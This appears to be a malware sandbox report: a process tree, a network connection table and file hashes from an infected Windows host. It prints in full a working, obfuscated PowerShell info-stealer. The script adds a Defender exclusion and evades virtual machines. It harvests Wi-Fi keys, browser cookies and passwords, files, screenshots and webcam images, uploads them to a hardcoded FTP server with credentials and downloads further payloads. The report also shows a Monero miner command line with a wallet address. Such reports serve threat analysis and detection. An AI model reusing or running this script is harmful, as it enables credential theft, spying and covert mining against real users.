C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic path win32_VideoController get name"
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic cpu get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic cpu get name
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\nbc55Wv49.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\nbc55Wv49.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "$IsVirtual=Get-CimInstance win32_computersystem | select -ExpandProperty Model;$IsVirtual"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI38922\AASIapp.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass "$startdate=(Get-Date 2022-11-09).toString(\"yyyy-MM-dd\") $enddate=(Get-Date 2023-03-12).toString(\"yyyy-MM-dd\") $today=Get-Date -format yyyy-MM-dd if($today -ge $startdate -and $today -le $enddate){ $ProgressPreference = \"S\"+\"i\"+\"l\"+\"e\"+\"n\"+\"t\"+\"l\"+\"y\"+\"C\"+\"o\"+\"n\"+\"t\"+\"i\"+\"n\"+\"u\"+\"e\" $new_line= \"A\"+\"d\"+\"d\"+\"-\"+\"M\"+\"p\"+\"P\"+\"r\"+\"e\"+\"f\"+\"e\"+\"r\"+\"e\"+\"n\"+\"c\"+\"e\"+\" -E\"+\"x\"+\"c\"+\"l\"+\"u\"+\"s\"+\"i\"+\"o\"+\"n\"+\"P\"+\"a\"+\"t\"+\"h\";$last_line=\"$pwd\".SubString(0,3);Invoke-Expression \"$new_line $last_line -Force\" $IsVirtual=Get-CimInstance win32_computersystem | select -ExpandProperty Model if ($IsVirtual -eq 'V'+'i'+'r'+'t'+'u'+'a'+'l'+'B'+'o'+'x'){ exit }elseif($IsVirtual -eq 'V'+'M'+'W'+'a'+'r'+'e') { exit }elseif($IsVirtual -eq 'H'+'y'+'p'+'e'+'r'+'-'+'V') { exit }elseif($IsVirtual -eq 'P'+'a'+'r'+'a'+'l'+'l'+'e'+'l'+'s') { exit }elseif($IsVirtual -eq 'O'+'r'+'a'+'c'+'l'+'e'+' '+'V'+'M'+' '+'V'+'i'+'r'+'t'+'u'+'a'+'l'+'B'+'o'+'x') { exit }elseif($IsVirtual -eq 'C'+'i'+'t'+'r'+'i'+'x'+' '+'H'+'y'+'p'+'e'+'r'+'v'+'i'+'s'+'o'+'r') { exit }elseif($IsVirtual -eq 'Q'+'E'+'M'+'U') { exit }elseif($IsVirtual -eq 'K'+'V'+'M') { exit }elseif($IsVirtual -eq 'P'+'r'+'o'+'x'+'m'+'o'+'x'+' '+'V'+'E') { exit }elseif($IsVirtual -eq 'D'+'o'+'c'+'k'+'e'+'r') { exit }else { cd \"$($env:APPDATA)\" $1=\"1\";$2=\"2\";$3=\"3\";$4=\"4\";$5=\"5\";$6=\"6\";$7=\"7\" $hey=Get-WinHomeLocation | Select -ExpandProperty HomeLocation ; $whoami=hostname;mkdir \"Cred\($hey)$whoami\$1-Password-Cookies\";mkdir \"Cred\($hey)$whoami\$7-Files\";mkdir \"Cred\($hey)$whoami\$2-wifi\";mkdir \"Cred\($hey)$whoami\$3-sysinfo\";mkdir \"Cred\($hey)$whoami\$4-mac\";mkdir \"Cred\($hey)$whoami\$5-history\";mkdir \"Cred\($hey)$whoami\$6-PublicIP\" (Invoke-WebRequest -uri \"http://ifconfig.me/ip\").Content | Out-File \"$env:APPDATA\Cred\($hey)$whoami\$6-PublicIP\publicIP.txt\" Get-ComputerInfo | Out-File 
\"$env:APPDATA\Cred\($hey)$whoami\$3-sysinfo\sys-info.txt\" ipconfig /all | Out-File \"$env:APPDATA\Cred\($hey)$whoami\$4-mac\mac.txt\" $UserName = \"$env:USERNAME\" $Path = \"$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History\" $Regex = \"(htt(p|s))://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?\" $Value = Get-Content -Path \"$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History\"|Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique | Out-File \"$env:APPDATA\Cred\($hey)$whoami\$5-history\chrome_history.txt\" $UserName = \"$env:USERNAME\" $Path = \"$Env:systemdrive\Users\$UserName\AppData\Local\Microsoft\Edge\User Data\Default\History\" $Regex = \"(htt(p|s))://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?\" $Value = Get-Content -Path \"$Env:systemdrive\Users\$UserName\AppData\Local\Microsoft\Edge\User Data\Default\History\"|Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique | Out-File \"$env:APPDATA\Cred\($hey)$whoami\$5-history\edge_history.txt\" (netsh wlan show profiles) | Select-String \"\:(.+)$\" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=\"$name\" key=clear)} | Select-String \"Key Content\W+\:(.+)$\" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-File -FilePath \"$env:APPDATA\Cred\($hey)$whoami\$2-wifi\extracted_wifi.txt\" cd \"$env:LOCALAPPDATA\";mkdir Programs;cd Programs;mkdir Python $cHucugLg5gggHgugjgLcg = New-Object System.Net.WebClient $cHucugLg5gggHgugjgLcg.DownloadFile(\"https://evilextractor.com/wp-content/uploads/2022/12/Python39-322.zip\",\"$($env:LOCALAPPDATA)\Programs\Python\Python39-322.zip\") Add-Type -AssemblyName System.IO.Compression.FileSystem function Unzip { param([string]$zipfile, [string]$outpath) [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath) } Unzip 
\"$($env:LOCALAPPDATA)\Programs\Python\Python39-322.zip\" \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322\" cd \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322\";.\ChromeCookiesView.exe /shtml cookies.html -Erroraction \"silentlycontinue\" Start-Sleep -Seconds 10 Get-Content cookies.html | Select-Object -Skip 5 | Out-File chrome_cookies.html $cookie_p = 'chrome_cookies.html' '<html><body><p><table border=\"1\" cellpadding=\"5\"><tr bgcolor=\"E0E0E0\">' + (Get-Content $cookie_p -Raw) | Set-Content $cookie_p Copy-Item -Path \"chrome_cookies.html\" -Recurse -Destination \"$env:APPDATA\Cred\($hey)$whoami\$1-Password-Cookies\chrome_cookies.html\" cd \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322\";.\mzcv_64.exe /shtml cookies_64-bit.html -Erroraction \"silentlycontinue\" Start-Sleep -Seconds 10 Get-Content cookies_64-bit.html | Select-Object -Skip 4 | Out-File mozilla_cookies_64-bit.html $m_64_cookie_p = 'mozilla_cookies_64-bit.html' '<html><body><p><table border=\"1\" cellpadding=\"5\"><tr bgcolor=\"E0E0E0\">' + (Get-Content $m_64_cookie_p -Raw) | Set-Content $m_64_cookie_p Copy-Item -Path \"mozilla_cookies_64-bit.html\" -Recurse -Destination \"$env:APPDATA\Cred\($hey)$whoami\$1-Password-Cookies\mozilla_cookies_64-bit.html\" cd \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322\";.\ChromeCookiesView.exe /CookiesFile \"$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Network\Cookies\" /shtml edgcookies.html -Erroraction \"silentlycontinue\" Start-Sleep -Seconds 10 Get-Content edgcookies.html | Select-Object -Skip 5 | Out-File edge_cookies.html $cookie_edg = 'edge_cookies.html' '<html><body><p><table border=\"1\" cellpadding=\"5\"><tr bgcolor=\"E0E0E0\">' + (Get-Content $cookie_edg -Raw) | Set-Content $cookie_edg Copy-Item -Path \"edge_cookies.html\" -Recurse -Destination \"$env:APPDATA\Cred\($hey)$whoami\$1-Password-Cookies\edge_cookies.html\" $mission_find=Get-ChildItem \"$env:APPDATA\Opera Software\Opera Stable\" -Filter \"Cookies\" -Recurse | % { 
$_.FullName } cd \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322\";.\ChromeCookiesView.exe /CookiesFile \"$mission_find\" /shtml oprcookies.html -Erroraction \"silentlycontinue\" Start-Sleep -Seconds 10 Get-Content oprcookies.html | Select-Object -Skip 5 | Out-File opera_cookies.html $cookie_opr = 'opera_cookies.html' '<html><body><p><table border=\"1\" cellpadding=\"5\"><tr bgcolor=\"E0E0E0\">' + (Get-Content $cookie_opr -Raw) | Set-Content $cookie_opr Copy-Item -Path \"opera_cookies.html\" -Recurse -Destination \"$env:APPDATA\Cred\($hey)$whoami\$1-Password-Cookies\opera_cookies.html\" cd \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322\";.\python.exe soax.py browsers | Out-File not_browser_passwords.txt Get-Content not_browser_passwords.txt | Select-Object -Skip 14 | Select-Object -SkipLast 4 | Out-File \"$env:APPDATA\Cred\($hey)$whoami\$1-Password-Cookies\Browser_passwords.txt\" cd \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322\";.\python.exe soax.py mails | Out-File not_mail_passwords.txt Get-Content not_mail_passwords.txt | Select-Object -Skip 14 | Select-Object -SkipLast 4 | Out-File \"$env:APPDATA\Cred\($hey)$whoami\$1-Password-Cookies\Mail_passwords.txt\" cd \"$($env:APPDATA)\";$hey=Get-WinHomeLocation | Select -ExpandProperty HomeLocation;$whoami=hostname;mkdir \"Cred\($hey)$whoami\$7-Files\Desktop\";mkdir \"Cred\($hey)$whoami\$7-Files\Downloads\" Get-Childitem \"$($env:USERPROFILE)\Desktop\\\" -Recurse -Include \"*.jpg\", \"*.png\", \"*.jpeg\",\"*.mp4\",\"*.mpeg\",\"*.mp3\",\"*.avi\",\"*.txt\",\"*.rtf\",\"*.xlsx\",\"*.docx\",\"*.pptx\",\"*.pdf\",\"*.rar\",\"*.zip\",\"*.7z\",\"*.csv\",\"*.xml\",\"*.html\" -Force | Copy-Item -Recurse -Destination \"$($env:APPDATA)\Cred\($hey)$whoami\$7-Files\Desktop\" -Force Get-Childitem \"$($env:USERPROFILE)\Downloads\\\" -Recurse -Include \"*.jpg\", \"*.png\", 
\"*.jpeg\",\"*.mp4\",\"*.mpeg\",\"*.mp3\",\"*.avi\",\"*.txt\",\"*.rtf\",\"*.xlsx\",\"*.docx\",\"*.pptx\",\"*.pdf\",\"*.rar\",\"*.zip\",\"*.7z\",\"*.csv\",\"*.xml\",\"*.html\" -Force | Copy-Item -Recurse -Destination \"$($env:APPDATA)\Cred\($hey)$whoami\$7-Files\Downloads\" -Force $ZILu5ZzGu4c2CjgNH = 'ftp://89.117.188.105/' $gLjG2gHNIu5cC52cHc = 'u762338928' $NHgHgcHc5gcj52CcuLg = 'P3wj6LTuKMFhzFpw' $jcugcgucHgHugLHggHc5 = \"$($env:APPDATA)\Cred\\\" $cHucugLg5gggHgugjgLcg.Credentials = New-Object System.Net.NetworkCredential($gLjG2gHNIu5cC52cHc,$NHgHgcHc5gcj52CcuLg) $SrcEntries = Get-ChildItem $jcugcgucHgHugLHggHc5 -Recurse $Srcfolders = $SrcEntries | Where-Object{$_.PSIsContainer} $SrcFiles = $SrcEntries | Where-Object{!$_.PSIsContainer} foreach($folder in $Srcfolders) { $gHugjHHcgHuLHguucHcHgcHL = $jcugcgucHgHugLHggHc5 -replace '\\','\\' -replace '\:','\:' $HcHgguguguLjHugcHHugcjj = $folder.Fullname -replace $gHugjHHcgHuLHguucHcHgcHL,$ZILu5ZzGu4c2CjgNH $HcHgguguguLjHugcHHugcjj = $HcHgguguguLjHugcHHugcjj -replace '\\', '/' try { $gcgcLHHuccHHguHHjuuLHucgg = [System.Net.WebRequest]::Create($HcHgguguguLjHugcHHugcjj); $gcgcLHHuccHHguHHjuuLHucgg.Credentials = New-Object System.Net.NetworkCredential($gLjG2gHNIu5cC52cHc,$NHgHgcHc5gcj52CcuLg); $gcgcLHHuccHHguHHjuuLHucgg.Method = [System.Net.WebRequestMethods+FTP]::MakeDirectory; $gcgcLHHuccHHguHHjuuLHucgg.GetResponse(); } catch [Net.WebException] { try { $LjuHHL5uc5uHgggguggjcg = [System.Net.WebRequest]::Create($HcHgguguguLjHugcHHugcjj); $LjuHHL5uc5uHgggguggjcg.Credentials = New-Object System.Net.NetworkCredential($gLjG2gHNIu5cC52cHc,$NHgHgcHc5gcj52CcuLg); $LjuHHL5uc5uHgggguggjcg.Method = [System.Net.WebRequestMethods+FTP]::PrintWorkingDirectory; $response = $LjuHHL5uc5uHgggguggjcg.GetResponse(); } catch [Net.WebException] { } } } foreach($entry in $SrcFiles) { $SrcFullname = $entry.fullname $SrcName = $entry.Name $SrcFilePath = $jcugcgucHgHugLHggHc5 -replace '\\','\\' -replace '\:','\:' $DesFile = $SrcFullname -replace 
$SrcFilePath,$ZILu5ZzGu4c2CjgNH $DesFile = $DesFile -replace '\\', '/' $uri = New-Object System.Uri($DesFile) $cHucugLg5gggHgugjgLcg.UploadFile($uri, $SrcFullname) } DEL \"$env:APPDATA\Microsoft\Windows\PowerShell\PSReadline\*\" -Recurse -Force DEL \"$($env:APPDATA)\Cred\" -Force -Recurse DEL \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322\*\" -Force -Recurse DEL \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322.zip\" -Force -Recurse $hey=Get-WinHomeLocation | Select -ExpandProperty HomeLocation;$whoami=hostname $WebClient = New-Object System.Net.WebClient $WebClient.DownloadFile(\"https://evilextractor.com/wp-content/uploads/2023/02/Parameter.zip\",\"$($env:APPDATA)\Parameter.zip\") Add-Type -AssemblyName System.IO.Compression.FileSystem function Unzip { param([string]$zipfile, [string]$outpath) [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath) } Unzip \"$($env:APPDATA)\Parameter.zip\" \"$($env:APPDATA)\Google-Update\" Start-Sleep -Seconds 12 cd \"$($env:APPDATA)\Google-Update\";.\Confirm.exe cd \"$($env:APPDATA)\";mkdir \"sharing\($hey)$whoami\Ss\"; mkdir \"sharing\($hey)$whoami\KeyLogs\" $cHucugLg5gggHgugjgLcg.DownloadFile(\"https://github.com/tedburke/CommandCam/archive/refs/heads/master.zip\",\"$($env:APPDATA)\master.zip\") Add-Type -AssemblyName System.IO.Compression.FileSystem function Unzip { param([string]$zipfile, [string]$outpath) [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath) } Unzip \"$($env:APPDATA)\master.zip\" \"$($env:APPDATA)\log_d_information_889176\" Start-Sleep -Seconds 12 while ($true) { [Reflection.Assembly]::LoadWithPartialName(\"S\"+\"y\"+\"s\"+\"t\"+\"e\"+\"m\"+\".\"+\"D\"+\"r\"+\"a\"+\"w\"+\"i\"+\"n\"+\"g\") function screenshot([Drawing.Rectangle]$bounds, $path) { $bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height $graphics = [Drawing.Graphics]::FromImage($bmp) $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size) $bmp.Save($path) 
$graphics.Dispose() $bmp.Dispose() } $count_web = (1+ $count_web).ToString('00') $count_sc = (1+ $count_sc).ToString('00') $bounds = [Drawing.Rectangle]::FromLTRB(0, 0, 1920, 1080) Start-Sleep -Seconds 600 screenshot $bounds \"$($env:APPDATA)\sharing\($hey)$whoami\Ss\screenshot$count_sc.png\" cd \"$($env:APPDATA)\log_d_information_889176\CommandCam-master\";.\CommandCam.exe /delay 50 /filename \"$env:APPDATA\sharing\($hey)$whoami\Ss\webcam$count_web.bmp\" $ZILu5ZzGu4c2CjgNH = 'ftp://89.117.188.105/' $gLjG2gHNIu5cC52cHc = 'u762338928' $NHgHgcHc5gcj52CcuLg = 'P3wj6LTuKMFhzFpw' $jcugcgucHgHugLHggHc5 = \"$($env:APPDATA)\sharing\\\" $cHucugLg5gggHgugjgLcg.Credentials = New-Object System.Net.NetworkCredential($gLjG2gHNIu5cC52cHc,$NHgHgcHc5gcj52CcuLg) $SrcEntries = Get-ChildItem $jcugcgucHgHugLHggHc5 -Recurse $Srcfolders = $SrcEntries | Where-Object{$_.PSIsContainer} $SrcFiles = $SrcEntries | Where-Object{!$_.PSIsContainer} foreach($folder in $Srcfolders) { $gHugjHHcgHuLHguucHcHgcHL = $jcugcgucHgHugLHggHc5 -replace '\\','\\' -replace '\:','\:' $HcHgguguguLjHugcHHugcjj = $folder.Fullname -replace $gHugjHHcgHuLHguucHcHgcHL,$ZILu5ZzGu4c2CjgNH $HcHgguguguLjHugcHHugcjj = $HcHgguguguLjHugcHHugcjj -replace '\\', '/' try { $gcgcLHHuccHHguHHjuuLHucgg = [System.Net.WebRequest]::Create($HcHgguguguLjHugcHHugcjj); $gcgcLHHuccHHguHHjuuLHucgg.Credentials = New-Object System.Net.NetworkCredential($gLjG2gHNIu5cC52cHc,$NHgHgcHc5gcj52CcuLg); $gcgcLHHuccHHguHHjuuLHucgg.Method = [System.Net.WebRequestMethods+FTP]::MakeDirectory; $gcgcLHHuccHHguHHjuuLHucgg.GetResponse(); } catch [Net.WebException] { try { $LjuHHL5uc5uHgggguggjcg = [System.Net.WebRequest]::Create($HcHgguguguLjHugcHHugcjj); $LjuHHL5uc5uHgggguggjcg.Credentials = New-Object System.Net.NetworkCredential($gLjG2gHNIu5cC52cHc,$NHgHgcHc5gcj52CcuLg); $LjuHHL5uc5uHgggguggjcg.Method = [System.Net.WebRequestMethods+FTP]::PrintWorkingDirectory; $response = $LjuHHL5uc5uHgggguggjcg.GetResponse(); } catch [Net.WebException] { } } } 
foreach($entry in $SrcFiles) { $SrcFullname = $entry.fullname $SrcName = $entry.Name $SrcFilePath = $jcugcgucHgHugLHggHc5 -replace '\\','\\' -replace '\:','\:' $DesFile = $SrcFullname -replace $SrcFilePath,$ZILu5ZzGu4c2CjgNH $DesFile = $DesFile -replace '\\', '/' $uri = New-Object System.Uri($DesFile) $cHucugLg5gggHgugjgLcg.UploadFile($uri, $SrcFullname) } DEL \"$env:APPDATA\Microsoft\Windows\PowerShell\PSReadline\*\" -Force -Recurse DEL \"$env:APPDATA\sharing\($hey)$whoami\Ss\*\" -Force -Recurse DEL \"$env:APPDATA\master.zip\" -Force -Recurse } } }else{ DEL \"$env:APPDATA\Microsoft\Windows\PowerShell\PSReadline\*\" -Force -Recurse exit } "
C:\Users\Admin\AppData\Local\Temp\_MEI38922\AASIapp.exe
C:\Users\Admin\AppData\Local\Temp\_MEI38922\AASIapp.exe
C:\Windows\system32\HOSTNAME.EXE
"C:\Windows\system32\HOSTNAME.EXE"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4816 -s 596
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 42iqvxeZwhYZGrYzGc44d3fv9Aq6TQ5jLbULdoHwfUd3Cnw6Ji2NC8G2LMxr6SwWTDGbrQs5rPXLk5odWxxnuj13K7yPrKZ.RIG1 -p X --algo rx/0 --cpu-max-threads-hint=50
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
C:\Windows\system32\ipconfig.exe
"C:\Windows\system32\ipconfig.exe" /all
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" wlan show profiles
Network
| Country | Destination | Domain | Proto |
| DE | 193.233.20.23:4124 | | tcp |
| US | 8.8.8.8:53 | 23.20.233.193.in-addr.arpa | udp |
| DE | 193.233.20.23:4124 | | tcp |
| DE | 193.233.20.15:80 | 193.233.20.15 | tcp |
| DE | 193.233.20.19:80 | 193.233.20.19 | tcp |
| US | 8.8.8.8:53 | 64.13.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.20.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.20.233.193.in-addr.arpa | udp |
| RU | 62.204.41.245:80 | 62.204.41.245 | tcp |
| US | 8.8.8.8:53 | 245.41.204.62.in-addr.arpa | udp |
| RU | 62.204.41.88:80 | 62.204.41.88 | tcp |
| NL | 185.246.221.126:80 | 185.246.221.126 | tcp |
| US | 8.8.8.8:53 | 126.221.246.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.41.204.62.in-addr.arpa | udp |
| NL | 45.15.159.15:80 | 45.15.159.15 | tcp |
| NL | 212.87.204.93:8081 | | tcp |
| US | 8.8.8.8:53 | 15.159.15.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.204.87.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cracked23.site | udp |
| NL | 185.241.208.138:80 | cracked23.site | tcp |
| US | 8.8.8.8:53 | 138.208.241.185.in-addr.arpa | udp |
| DE | 193.233.20.23:4124 | | tcp |
| DE | 193.233.20.23:4124 | | tcp |
| US | 8.8.8.8:53 | ifconfig.me | udp |
| US | 34.160.111.145:80 | ifconfig.me | tcp |
| US | 8.8.8.8:53 | 145.111.160.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xiaoxiaojue.duckdns.org | udp |
| NL | 212.87.204.245:55215 | xiaoxiaojue.duckdns.org | tcp |
| US | 8.8.8.8:53 | 52.4.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.204.87.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | transfer.sh | udp |
| DE | 144.76.136.153:443 | transfer.sh | tcp |
| US | 8.8.8.8:53 | 153.136.76.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr.2miners.com | udp |
| DE | 162.19.139.184:2222 | xmr.2miners.com | tcp |
| US | 8.8.8.8:53 | 184.139.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | evilextractor.com | udp |
| NL | 185.166.188.203:443 | evilextractor.com | tcp |
| US | 8.8.8.8:53 | 203.188.166.185.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sae82ET33.exe
| MD5 | a274f8929ea03f27d263663c8f91bcdf |
| SHA1 | d81d47b5bf9c8d903630b092fcf409108a3f774f |
| SHA256 | 2170383fd0993533e99c50ba62556338ded262bd6f3fc59aa0be4e69b4ee756f |
| SHA512 | 200c93a174a1d56e7ff615a6dd1a34b30ff6c73d813c1b2e3f21936402e9b1339a3322e25c2a5bb00cf4046307f42dec44f3715359caada91e88ad577f3c7f30 |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sGf94Oe29.exe
| MD5 | 2bc41067f141541c653538c8fe52fc47 |
| SHA1 | fcf028eb01bceaabf1dab3bfc9fb8cbca57a606e |
| SHA256 | 4456c2457b997a7b896b1e055dbd038310c17706bb03dd0efc83b5da6692fcca |
| SHA512 | 522d31646f8ff3e864973d75edcd80f6fc87ceab6b9eee1a89f26b3a1ca274b4f07eb836b162a4bcc9b0e795dd9591daf0ec8865639da495823c56fd17311ea0 |
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sAl36tz78.exe
| MD5 | e9fabb11dad7807b3d31297fd67d3021 |
| SHA1 | 6b693a601dca6d3e1532a5f766a8ef1f98f84c7a |
| SHA256 | 55edb8086b136ccdb757049718f5d2459f695c8ae8c6ea65eac28d6f9d1c9ae8 |
| SHA512 | ff0a5401575580d38daedd8c5b598defb3f9388b40fa11e845514a20f14a5cf5837140e418c65313db922788c7c9a204032ce0fcf767bab8847afd3ad70a9b91 |
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iMJ64Qj.exe
| MD5 | 5b143b7f6940e9de958b67626b1dbd87 |
| SHA1 | 5ba04498673d2351a6be4139cb39f971a17fa3af |
| SHA256 | 0e19dc7d29ce59c27cb95ee236362e67132028eef5142897003a78a0395297d2 |
| SHA512 | bb35a3466ba62ab60d0861bf40be658dd2efbdd839aa4f4e7b3b631b2e39da4ab4674f583cd0319e143b4aa3c2bfd2b7988aaae790b7c3e7e6d4e2efcb04bcaa |
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\kPe14na.exe
| MD5 | a6adc2e80b48f93ba7b7a58f2465d794 |
| SHA1 | f27bbdf26dbb193c5f5e8ee97aea6e786562fd0a |
| SHA256 | a8d3a71edf6a6d2a647021f26bc97cf728dccf92b22663e6b9624f43fff427f4 |
| SHA512 | ec7797e25e7ccc87ecd84b2e658ce547db2ee46329c78437c03b55117cc1c56a55a6c267f92aabf5debbad324d6233c87e102db12a3d562d769c08424ed79c41 |
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mzD76SI.exe
| MD5 | f74e99a7c08bb4d44d32eeaf18062492 |
| SHA1 | 1e225b042b87db87204d987c46958ffde22b3931 |
| SHA256 | 355f78909c632de991d0063375b7535310677525925ee07f262cdf1d73eed14b |
| SHA512 | 9a71cfb769db5b3092703e37716c0007c60ed54671dab43b17ea63120f09685a68a9aaebdad194e9c59be021768e91fc53a5f010542d7dc7a397ccc241bcf429 |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\niG10yv56.exe
| MD5 | a6adc2e80b48f93ba7b7a58f2465d794 |
| SHA1 | f27bbdf26dbb193c5f5e8ee97aea6e786562fd0a |
| SHA256 | a8d3a71edf6a6d2a647021f26bc97cf728dccf92b22663e6b9624f43fff427f4 |
| SHA512 | ec7797e25e7ccc87ecd84b2e658ce547db2ee46329c78437c03b55117cc1c56a55a6c267f92aabf5debbad324d6233c87e102db12a3d562d769c08424ed79c41 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rtz28ED46.exe
| MD5 | 62fcfb3364b29b80ff25dbaac9d996be |
| SHA1 | 65ddd1e0d0da59ece403976108e9173c847adcd1 |
| SHA256 | df3c03a2b576d0b973ca15df8f95afca29c3ba06aefebcaecb9ca69d87cf3c29 |
| SHA512 | d925e4f725c2a325d313f74cbb85ef6234ff6763596d3dc3a359a86b57d954e00a675c078ed3b6535e4a8a04f76861a0d92e44be6f825b83bb4511b7f26ccc0a |
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
| MD5 | 62fcfb3364b29b80ff25dbaac9d996be |
| SHA1 | 65ddd1e0d0da59ece403976108e9173c847adcd1 |
| SHA256 | df3c03a2b576d0b973ca15df8f95afca29c3ba06aefebcaecb9ca69d87cf3c29 |
| SHA512 | d925e4f725c2a325d313f74cbb85ef6234ff6763596d3dc3a359a86b57d954e00a675c078ed3b6535e4a8a04f76861a0d92e44be6f825b83bb4511b7f26ccc0a |
C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe
| MD5 | fca1da749021b47280cd7c2f45013dda |
| SHA1 | 329ee9034eaaa010c7d627575398d34ac0eed75e |
| SHA256 | e572f014dfa53dc96c087d6bc129127e2eb8e4056b3c38881cefb23f88dd49f8 |
| SHA512 | 77e72d90cfb1e6534639162d0d20e0ee3a2ad730101c77eebd813cb7749d6d6b18f1768bc552dcf8eb43ac9e38b15ffa0ecb73517bcb4107158fad002b63e409 |
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\ejy69Rn37.exe
| MD5 | a6adc2e80b48f93ba7b7a58f2465d794 |
| SHA1 | f27bbdf26dbb193c5f5e8ee97aea6e786562fd0a |
| SHA256 | a8d3a71edf6a6d2a647021f26bc97cf728dccf92b22663e6b9624f43fff427f4 |
| SHA512 | ec7797e25e7ccc87ecd84b2e658ce547db2ee46329c78437c03b55117cc1c56a55a6c267f92aabf5debbad324d6233c87e102db12a3d562d769c08424ed79c41 |
C:\Users\Admin\AppData\Local\Temp\1000021001\lebro.exe
| MD5 | ebd584e9c1a400cd5d4bafa0e7936468 |
| SHA1 | d263c62902326425ed17855d49d35003abcd797b |
| SHA256 | ad1d5475d737c09e3c48f7996cd407c992c1bb5601bcc6c6287eb80cde3d852b |
| SHA512 | e94b7bca0258e2f2fd374898c87196587311af4aa20f1197ef8d0fddcdc098fdd0096152d27b49cbe21a3527624339fe0c806c7aa4ea6c80b76764ee2245a010 |
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
| MD5 | ebd584e9c1a400cd5d4bafa0e7936468 |
| SHA1 | d263c62902326425ed17855d49d35003abcd797b |
| SHA256 | ad1d5475d737c09e3c48f7996cd407c992c1bb5601bcc6c6287eb80cde3d852b |
| SHA512 | e94b7bca0258e2f2fd374898c87196587311af4aa20f1197ef8d0fddcdc098fdd0096152d27b49cbe21a3527624339fe0c806c7aa4ea6c80b76764ee2245a010 |
C:\Users\Admin\AppData\Local\Temp\1000279001\bin.exe
| MD5 | af4268c094f2a9c6e6a85f8626b9a5c7 |
